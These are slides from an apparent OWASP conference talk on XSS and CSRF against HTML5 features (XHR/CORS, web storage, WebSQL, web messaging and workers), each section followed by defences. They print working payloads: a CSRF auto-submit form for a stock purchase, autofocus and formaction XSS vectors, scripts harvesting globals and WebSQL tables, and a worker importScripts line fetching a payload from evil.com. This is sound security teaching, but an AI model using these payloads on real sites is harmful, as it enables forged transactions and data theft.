XSS and CSRF with HTML5
- 1. XSS & CSRF with HTML5
Attack, Exploit and Defense
Shreeraj Shah
Blueinfy Solutions Pvt. Ltd.
shreeraj.shah@blueinfy.net
OWASP
OWASP AppSecUSA 2012
Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
http://www.owasp.org
- 2. http://shreeraj.blogspot.com
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
shreeraj@blueinfy.com
http://www.blueinfy.com
Who Am I? http://www.blueinfy.com
Twitter --@shreeraj
Twitter @shreeraj
Founder & Director
Blueinfy & iAppSecure Solutions Pvt. Ltd.
Past experience
Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino
Dev)
Interest
Web security research
Published research
Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.
Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan,
AppPrint etc.
Advisories - .Net, Java servers etc.
Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc.
Books (Author)
Web 2.0 Security – Defending Ajax, RIA and SOA
Hacking Web Services
Web Hacking
OWASP
2
- 4. HTML5 – Attacks on the rise …
Evolution of HTML5
1991 – HTML started (plain and simple)
1996 – CSS & JavaScript (Welcome to world of XSS and browser security)
2000 – XHTML1 (Growing concerns and attacks on browsers)
2005 – AJAX, XHR, DOM – (Attack cocktail and surface expansion)
2009 – HTML5 (Here we go… new surface, architecture and defense) –
HTML+CSS+JS
OWASP
4
- 5. Modern Browser Model
Mobile
HTML5 + CSS Silverlight Flash
API (Media, Geo etc.) & Messaging Plug-In
Presentation
JavaScript DOM/Events Parser/Threads
Process & Logic
WebSQL Cache Storage
FileSystem
XHR 1 & 2 WebSocket Plug-in Sockets
Browser Native Network Services Network
& Access
SOP/CORS/Content-Sec Sandbox Core
Policies
OWASP
5
- 6. HTML5 Architecture & Threat Model
User Interface
Cross Domain
Application
Sandbox (Origin – Policy )
HTML/CSS
Single
JavaScript Internet
DOM/Page
Application
XHR Target
DOM WebSockets Application
Native
Storage, WebSQL, IndexedDB Messaging APIs Geolocation and other
FileSystem, Cache - APIs APIs
OWASP
6
- 8. CSRF Attack Vector
ge Attacker’s
a RF
r’ sp s CS Site Authentication
ke
c nd Server
tta r se a d
it A ke ylo
Vis t ac pa
At
CSRF Attack – with session
Login
Success – cookie set
Success
Web Store Database
Client/Victim
Application Server
Browser
Server
Successful exploitation …
•SOP bypass
•Cookie Replay
OWASP
8
- 9. SOP bypass and Cookie Replay – Basic Type
GET Request
IMG SRC
<img src="http://host/?command">
SCRIPT SRC
<script src="http://host/?command">
IFRAME SRC
<iframe src="http://host/?command">
POST Request
<script type="text/javascript" language="JavaScript">
document.foo.submit();
</script>
OWASP
9
- 11. CSRF injection – splitting and forcing …
<html>
<body>
<FORM NAME="buy" ENCTYPE="text/plain"
action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST">
<input type="hidden" name='<?xml version' value='"1.0"?
><methodCall><methodName>stocks.buy</methodName><params><param
><value><string>MSFT</string></value></param><param><value><double>2
6</double></value></param></params></methodCall>'>
</FORM>
<script>document.buy.submit();</script>
</body>
</html>
OWASP
11
- 12. CSRF with XHR and CORS bypass
Mobile
HTML5 + CSS Silverlight Flash
API (Media, Geo etc.) & Messaging Plug-In
Presentation
JavaScript DOM/Events Parser/Threads
Process & Logic
WebSQL Cache Storage
XHR 1 & 2 WebSocket Plug-in Sockets
Browser Native Network Services Network
& Access
SOP/CORS Sandbox Core
Policies
OWASP
12
- 13. XHR – Level 2 powering CSRF
XHR object of HTML5 is very powerful
Allows interesting features like cross origin request and
binary upload/download
xhr.responseType can be set to "text", "arraybuffer",
"document“ and "blob“
Also, for posting data stream - DOMString,
Document, FormData, Blob, File, ArrayBuffer etc…
OWASP
13
- 14. CORS & XHR – ingredients for CSRF
Before HTML5 – Cross Domain was not possible
through XHR (SOP applicable)
HTML5 – allows cross origin calls with XHR-Level 2
calls
CORS – Cross Origin Resource Sharing needs to be
followed (Option/Preflight calls)
Adding extra HTTP header (Access-Control-Allow-
Origin and few others)
OWASP
14
- 15. CORS based HTTP Headers
Request
Origin
Access-Control-Request-Method (preflight)
Access-Control-Request-Headers (preflight)
Response
Access-Control-Allow-Origin
Access-Control-Allow-Credentials
Access-Control-Allow-Expose-Headers
Access-Control-Allow-Max-Age (preflight)
Access-Control-Allow-Allow-Methods (preflight)
Access-Control-Allow-Allow-Headers (preflight)
OWASP
15
- 16. XHR – Stealth POST/GET
CSRF – powered by CORS and XHR
Hence, allow stealth channel and possible silent
exploitation
One way CSRF with any stream since XHR allows raw
stream from browser (XML, JSON, Binary as well)
Two way CSRF (POST and read both – in case of allow set
to *)
OWASP
16
- 17. Exploiting the use case
CORS preflight bypass – certain Content-Type bypass
preflight HTTP
Forcing cookie replay by “withCredentials”
Internal network scanning and tunneling
Information harvesting (internal crawling)
Stealth browser shell – post XSS (Allow origin- *)
Business functionality abuse (upload and binary
streams)
OWASP
17
- 18. CSRF with XHR/HTML5
Authentication
User Server
establishing
Session
Login request (HTTPS)
Session cookie
Web Store Database
Client/Victim
Application Server
Browser
Server
OWASP
18
- 19. CSRF with XHR/HTML5
Browser using
XHR Call Authentication
JavaScript User making Server
a buy over
HTTP
Placing an order (JSON services)
Success
Web Store Database
Client/Victim
Application Server
Browser
Server
OWASP
19
- 20. CSRF with XHR/HTML5
ge Attacker’s
a RF
r’ sp s CS Site
Session is
Authentication
ke
c nd Server
tta r se a d still live – not
it A ke ylo
Vis t ac pa yet logged
At
out
Web Store Database
Client/Victim
Application Server
Browser
Server
Leveraging XHR Call
• Content-type to avoid pre flight
• “withCredentials” set to true
OWASP
20
- 22. CSRF with XHR/HTML5
ge Attacker’s
a RF
r’ sp s CS Site Authentication
ke
c nd Server
tta r se a d
it A ke ylo
Vis t ac pa
At
XHR initiates HTTP buy request
Success – cookie replayed
Web Store Database
Client/Victim
Application Server
Browser
Server
Hence,
• Without victim’s consent or notice Got it
• Stealth HTTP request generated
• Silent Exploitation takes place
OWASP
22
- 24. CSRF with XHR/HTML5
Browser is
having Form
(multi-part) Business Authentication
Server
layer
function of
uploading
Uploading bulk orders
Success
Web Store Database
Client/Victim
Application Server
Browser
Server
OWASP
24
- 26. CSRF with XHR/HTML5
ge Attacker’s
a RF
r’ sp s CS Site Authentication
ke
c nd Server
tta r se a d
it A ke ylo
Vis t ac pa
At
XHR initiates HTTP multi-part - Upload
Success – cookie replayed
Web Store Database
Client/Victim
Application Server
Browser
Server
Hence,
• Without victim’s consent or notice Got it
• Stealth HTTP Upload takes place
• Silent Exploitation…
OWASP
26
- 28. Internal Scan – not scan but crawl as well …
Attacker’s
Site
Internet
Internet
CSRF Payload
And stealth channel
Client/Victim Intranet
Intranet
Browser
Internal Web Internal HR
Internal Web/App
Mail Application
Server
OWASP
28
- 30. Scan and Defend
Scan and look for
Content-Type checking on server side
CORS policy scan
Form and Upload with tokens or not
Defense and Countermeasures
Secure libraries for streaming HTML5/Web 2.0 content
CSRF protections
Stronger CORS implementation
OWASP
30
- 32. XSS with HTML5 (tags, attributes and events)
Mobile
HTML5 + CSS Silverlight Flash
API (Media, Geo etc.) & Messaging Plug-In
Presentation
JavaScript DOM/Events Parser/Threads
Process & Logic
WebSQL Cache Storage
XHR 1 & 2 WebSocket Plug-in Sockets
Browser Native Network Services Network
& Access
SOP/CORS Sandbox Core
Policies
OWASP
32
- 33. HTML5 – Tags/Attributes/Events
Tags – media (audio/video), canvas (getImageData),
menu, embed, buttons/commands, Form control
(keys)
Attributes – form, submit, autofocus, sandbox,
manifest, rel etc.
Events/Objects – Navigation (_self), Editable content,
Drag-Drop APIs, pushState (History) etc.
OWASP
33
- 35. XSS variants
Exploiting autofocus
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
OWASP
35
- 36. XSS variants
Form & Button etc.
<form id="test" /><button form="test"
formaction="javascript:alert(1)">test
<form><button formaction="javascript:alert(1)">test
Etc … and more …
Nice HTML5 XSS cheat sheet (http://html5sec.org/)
OWASP
36
- 37. Scan and Defend
Scan and look for
Reflected or Persistent XSS spots with HTML5 tags
Defense and Countermeasures
Have it added on your blacklist
Standard XSS protections by encoding
OWASP
37
- 38. CSP in Action – HTML5 defense …
Content Security Policy – Defending browser against
possible post attack scenarios
Based on Origin (SOP the key)
Allows whitelisting mechanism for what “to do” and “not
to do”
It is possible to send back notification to application when
violation takes place
Implementation by extra HTTP headers [Brower to
browser X-WebKit-CSP (S/C) X-Content-Security-Policy (F)]
OWASP
38
- 40. Controlling Browser
connect-src – Controlling WebSocket, XHR etc.
frame-src – Source of the frame (ClickJacking)
object-src – Flash, Silverlight etc.
media-src – controlling audio and video
img/style – image and style sources
default-src https:; - locking over SSL only
OWASP
40
- 41. Example
Persistent XSS injected
HTTP/1.1 200 OK
Date: Wed, 12 Sep 2012 14:40:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-WebKit-CSP: script-src 'self'
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6146
OWASP
41
- 42. Storage extraction with XSS
Mobile
HTML5 + CSS Silverlight Flash
API (Media, Geo etc.) & Messaging Plug-In
Presentation
JavaScript DOM/Events Parser/Threads
Process & Logic
WebSQL Cache Storage
XHR 1 & 2 WebSocket Plug-in Sockets
Browser Native Network Services Network
& Access
SOP/CORS Sandbox Core
Policies
OWASP
42
- 43. Web Storage Extraction
Browser has one place to store data – Cookie
(limited and replayed)
HTML5 – Storage API provided (Local and Session)
Can hold global scoped variables
http://www.w3.org/TR/webstorage/
OWASP
43
- 44. Web Storage Extraction
It is possible to steal them through XSS or via
JavaScript
Session hijacking – HttpOnly of no use
getItem and setItem calls
XSS the box and scan through storage
OWASP
44
- 46. File System Storage
HTML5 provides virtual file system with filesystem
APIs
window.requestFileSystem = window.requestFileSystem
|| window.webkitRequestFileSystem;
It becomes a full blown local system for application
in sandbox
It empowers application
OWASP
46
- 47. File System Storage
It provides temporary or permanent file system
function init() {
window.requestFileSystem(window.TEMPORARY, 1024*1024,
function(filesystem) {
filesys = filesystem;
}, catcherror);
}
App can have full filesystem in place now.
OWASP
47
- 50. Single DOM/One Page App - XSS
Applications run with “rich” DOM
JavaScript sets several variables and parameters
while loading – GLOBALS
It has sensitive information and what if they are
GLOBAL and remains during the life of application
It can be retrieved with XSS
HTTP request and response are going through
JavaScripts (XHR) – what about those vars?
OWASP
50
- 51. Blind Enumeration
for(i in window){
obj=window[i];
try{
if(typeof(obj)=="string"){
console.log(i);
console.log(obj.toString());
}
}catch(ex){}
}
OWASP
51
- 52. Global Sensitive Information Extraction from DOM
HTML5 apps running on Single DOM
Having several key global variables, objects and array
var arrayGlobals =
['my@email.com',"12141hewvsdr9321343423mjfdvint","t
est.com"];
Post DOM based exploitation possible and harvesting
all these values.
OWASP
52
- 53. Global Sensitive Information Extraction from DOM
for(i in window){
obj=window[i];
if(obj!=null||obj!=undefined)
var type = typeof(obj);
if(type=="object"||type=="string")
{
console.log("Name:"+i)
try{
my=JSON.stringify(obj);
console.log(my)
}catch(ex){}
}
}
OWASP
53
- 54. Scan and Defend
Scan and look for
Scanning storage
Defense and Countermeasures
Do not store sensitive information on localStorage and
Globals
XSS protection
OWASP
54
- 55. SQLi & Blind Enumeration through XSS
Mobile
HTML5 + CSS Silverlight Flash
API (Media, Geo etc.) & Messaging Plug-In
Presentation
JavaScript DOM/Events Parser/Threads
Process & Logic
WebSQL Cache Storage
XHR 1 & 2 WebSocket Plug-in Sockets
Browser Native Network Services Network
& Access
SOP/CORS Sandbox Core
Policies
OWASP
55
- 56. SQL Injection
WebSQL is part of HTML 5 specification, it provides
SQL database to the browser itself.
Allows one time data loading and offline browsing
capabilities.
Causes security concern and potential injection
points.
Methods and calls are possible
OWASP
56
- 58. Blind WebSQL Enumeration
var dbo;
var table;
var usertable;
for(i in window){
obj = window[i];
try{
if(obj.constructor.name=="Database"){
dbo = obj;
obj.transaction(function(tx){
tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'',
[],function(tx,results){
table=results;
},null);
});
}
}catch(ex){}
}
if(table.rows.length>1)
usertable=table.rows.item(1).name;
OWASP
58
- 59. Blind WebSQL Enumeration
We will run through all objects and get object where
constructor is “Database”
We will make Select query directly to sqlite_master
database
We will grab 1st table leaving webkit table on 0th entry
OWASP
59
- 61. Web Messaging and Worker Injection
Mobile
HTML5 + CSS Silverlight Flash
API (Media, Geo etc.) & Messaging Plug-In
Presentation
JavaScript DOM/Events Parser/Threads
Process & Logic
WebSQL Cache Storage
XHR 1 & 2 WebSocket Plug-in Sockets
Browser Native Network Services Network
& Access
SOP/CORS Sandbox Core
Policies
OWASP
61
- 62. Web Messaging
HTML5 is having new interframe communication system
called Web Messaging.
By postMessage() call parent frame/domain can call with
the iframe
Iframe can be loaded on cross domain. Hence, create
issues – data/information validation & data leakage by
cross posting possible
worker.webkitPostMessage – faster transferable objects
OWASP
62
- 63. Web Messaging - Scenario
If postMessage() is set to * so page can be loaded in
iframe and messaging can be hijacked
Also, origin is not set to fixed then again frame listen
from any domian – again an issue
Stream coming needs to be checked before
innerHTML or eval()
Iframe or Web Worker can glue two streams – same
domain or cross domain
OWASP
63
- 65. Web Worker – Hacks!
Web Workers allows threading into HTML pages
using JavaScript
No need to use JavaScript calls like
setTimeout(), setInterval(), XMLHttpRequest, and
event handlers
Totally Async and well supported
[initialize] var worker = new Worker('task.js');
[Messaging] worker.postMessage();
OWASP
65
- 66. Web Worker – Hacks!
Web Page
Current DOM
Web Worker
XHR, Location, Navigator etc.
JavaScript Runtime Browser
Platform Background
Thread on same
Scope and Object – No DOM Access page - messaging
Regex, Array, JSON etc…
OWASP
66
- 67. Web Worker – Hacks!
Security issues
It is not allowing to load cross domain worker scripts.
(http:, https:,javascript:,data : -No)
It has some typical issues
It allows the use of XHR. Hence, in-domain and CORS requests
possible
It can cause DoS – if user get stream to run JavaScript in worker
thread. Don’t have access to parent DOM though
Message validation needed – else DOM based XSS
OWASP
67
- 68. Web Worker – Hacks!
Exmaple
<html>
<button onclick="Read()">Read Last Message</button>
<button onclick="stop()">Stop</button>
<output id="result"></output>
<script>
function Read() {
worker.postMessage({'cmd': 'read', 'msg': 'last'});
}
function stop() {
worker.postMessage({'cmd': 'stop', 'msg': 'stop it'});
alert("Worker stopped");
}
var worker = new Worker('message.js');
worker.addEventListener('message', function(e) {
document.getElementById('result').innerHTML = e.data;
}, false);
</script>
</html>
OWASP
68
- 69. Web Workers – Hacks!
Possible to cause XSS
Running script
Passing hidden payload
Also, web workers can help in embedding silent
running js file and can be controlled.
Can be a tool for payload delivery and control within
browser framework
importScripts("http://evil.com/payload.js") – worker
can run cross domain script
OWASP
69
- 70. Scan and Defend
Scan and look for
JavaScript scanning
Messaging and Worker implementation
DOM calls
Use of eval(), document.* calls etc.
Defense and Countermeasures
Same origin listening is a must for messaging event
Secure JavaScript coding
OWASP
70
- 71. APIs …
HTML5 few other APIs are interesting from security
standpoint
File APIs – allows local file access and can mixed with
ClickJacking and other attacks to gain client files.
Drag-Drop APIs – exploiting self XSS and few other tricks,
hijacking cookies …
Lot more to explore and defend…
OWASP
71
- 73. http://shreeraj.blogspot.com
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
shreeraj@blueinfy.com
http://www.blueinfy.com
http://www.blueinfy.com
CONCLUSION AND QUESTIONS
OWASP
73